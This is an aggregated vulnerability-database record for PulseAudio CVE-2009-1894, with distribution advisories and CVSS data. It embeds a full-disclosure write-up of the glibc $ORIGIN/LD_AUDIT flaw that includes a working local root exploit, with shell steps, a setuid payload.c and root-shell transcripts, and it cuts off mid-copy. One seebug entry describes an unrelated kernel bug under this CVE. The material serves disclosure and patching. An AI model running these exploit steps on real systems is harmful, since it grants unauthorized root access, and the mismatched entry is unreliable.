http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93702 46d917e58daacc5260b911be29d55c46\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 353434 c7ee1906b4ca8d317b3c7188b7e93458\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 65790 bb598f0efa599c5f41c2b4e48882052a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 86014 d8ed73c0885f744fdbb5b8204ee5a088\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 77468 c129ad3556417f4d80d6628b62ab904f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 57622 ff9552b5a136ba5ecb50e2e438a0acd0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 97486 7ef20c0cbad0de3f971839f5f3cc0399\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 391866 aaa17f0fcfa72656840f5bea493aff1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 64034 5248974c7b2bd5d1353741ceb4eb6392\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 351832 ee16cc3391e7819f299e71d0013903b2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 101580 24faa396862fcc9b4c29b530382184fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 261054 f351146c55677ec3f16a728d254c56f0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67958 0dd121a16e0eec31c07cba4832fe845d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67122 cab4efcc68c29ed251c818fd590a1e61\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 79168 33d184042be0a8133cad9b244b88dc4f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93242 b42621e1fda017e93045ed4efd87b56f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 174586 e1aaa6e1a9b6aa1af1dcb0c8b414a10d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 60278 bc1218b7eca8891a367f7c880cf5022f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 617574 fd0bedd20efa06edde82525e9e2330b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 331682 552d2a40027cde0d1a9cc8360fad0ace\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 190684 e71731d57b84a892f0683e5b52f7557b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-07-18T12:18:19", "type": "debian", "title": "[SECURITY] [DSA 1838-1] New pulseaudio packages fix privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T12:18:19", "id": "DEBIAN:DSA-1838-1:2C084", "href": "https://lists.debian.org/debian-security-announce/2009/msg00152.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-23T06:31:56", "description": "### Background\n\nPulseAudio is a network-enabled sound server with an advanced plug-in system. \n\n### Description\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster. \n\n### Impact\n\nA local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges. \n\n### Workaround\n\nEnsure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users. \n\n### Resolution\n\nAll PulseAudio users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/pulseaudio-0.9.9-r54\"", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "gentoo", "title": "PulseAudio: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "GLSA-200907-13", "href": "https://security.gentoo.org/glsa/200907-13", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-09-01T10:04:57", "description": "## Releases\n\n * Ubuntu 9.04 \n * Ubuntu 8.10 \n * Ubuntu 8.04 \n\n## Packages\n\n * pulseaudio \\- \n\nTavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not \nsafely re-execute itself. A local attacker could exploit this to gain \nroot privileges.\n", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "ubuntu", "title": "PulseAudio vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "USN-804-1", "href": "https://ubuntu.com/security/notices/USN-804-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-10T07:05:22", "description": "\nTavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\n\nThe old stable distribution (etch) is not affected by this issue.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\n\nWe recommend that you upgrade your pulseaudio packages.\n\n\n", "cvss3": {}, "published": "2009-07-18T00:00:00", "type": "osv", "title": "pulseaudio - privilege escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2022-08-10T07:05:20", "id": "OSV:DSA-1838-1", "href": "https://osv.dev/vulnerability/DSA-1838-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:43:01", "description": "BUGTRAQ ID: 35724\r\nCVE(CAN) ID: CVE-2009-1894\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684drivers/net/tun.c\u6587\u4ef6\u4e2d\u7684tun_chr_poll()\u51fd\u6570\u5b58\u5728\u7a7a\u6307\u9488\u5f15\u7528\u9519\u8bef\uff1a\r\n\r\n int fd;\r\n struct pollfd pfd;\r\n fd = open("/dev/net/tun", O_RDWR);\r\n pfd.fd = fd;\r\n pfd.events = POLLIN | POLLOUT;\r\n poll(&pfd, 1, 0);\r\n\r\n\u5982\u679c\u7528\u6237\u5bf9tun\u8bbe\u5907\u6267\u884c\u4e86open()\u548cpoll()\u64cd\u4f5c\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u5d29\u6e83\u6216\u4ee5root\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\u6210\u529f\u653b\u51fb\u8981\u6c42\u4f7f\u7528GCC\u7684-fdelete-null-pointer-checks\u4f18\u5316\u7f16\u8bd1\u4e86\u5185\u6838\u3002\n\nLinux kernel 2.6.30\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3c8a9c63d5fd738c261bd0ceece04d9c8357ca13", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "seebug", "title": "Linux Kernel tun_chr_pool()\u51fd\u6570\u7a7a\u6307\u9488\u5f15\u7528\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11842", "id": "SSV:11842", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:37:59", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "GNU C library dynamic linker $ORIGIN expansion Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70027", "id": "SSV:70027", "sourceData": "\n from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\r\n\r\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. */\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\r\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70027", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-09-23T03:19:48", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "cve", "title": "CVE-2009-1894", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2023-02-13T01:17:00", "cpe": ["cpe:/a:pulseaudio:pulseaudio:0.9.9", "cpe:/a:pulseaudio:pulseaudio:0.9.10", "cpe:/a:pulseaudio:pulseaudio:0.9.14"], "id": "CVE-2009-1894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pulseaudio:pulseaudio:0.9.10:*:*:*:*:*:*:*", "cpe:2.3:a:pulseaudio:pulseaudio:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:pulseaudio:pulseaudio:0.9.14:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-09-25T06:49:59", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "debiancve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T16:30:00", "id": "DEBIANCVE:CVE-2009-1894", "href": "https://security-tracker.debian.org/tracker/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:55", "description": "", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "packetstorm", "title": "GNU C Library Dynamic Linker $ORIGIN Expansion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-19T00:00:00", "id": "PACKETSTORM:94955", "href": "https://packetstormsecurity.com/files/94955/GNU-C-Library-Dynamic-Linker-ORIGIN-Expansion-Vulnerability.html", "sourceData": "`The GNU C library dynamic linker expands $ORIGIN in setuid library search path \n------------------------------------------------------------------------------ \n \nGruezi, This is CVE-2010-3847. \n \nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of \ndynamically linked programs. ld.so operates in two security modes, a permissive \nmode that allows a high degree of control over the load operation, and a secure \nmode (libc_enable_secure) intended to prevent users from interfering with the \nloading of privileged executables. \n \n$ORIGIN is an ELF substitution sequence representing the location of the \nexecutable being loaded in the filesystem hierarchy. The intention is to allow \nexecutables to specify a search path for libraries that is relative to their \nlocation, to simplify packaging without spamming the standard search paths with \nsingle-use libraries. \n \nNote that despite the confusing naming convention, $ORIGIN is specified in a \nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the \nenvironment (developers would normally use the -rpath ld parameter, or \n-Wl,-rpath,$ORIGIN via the compiler driver). \n \nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID \nbinaries, \n 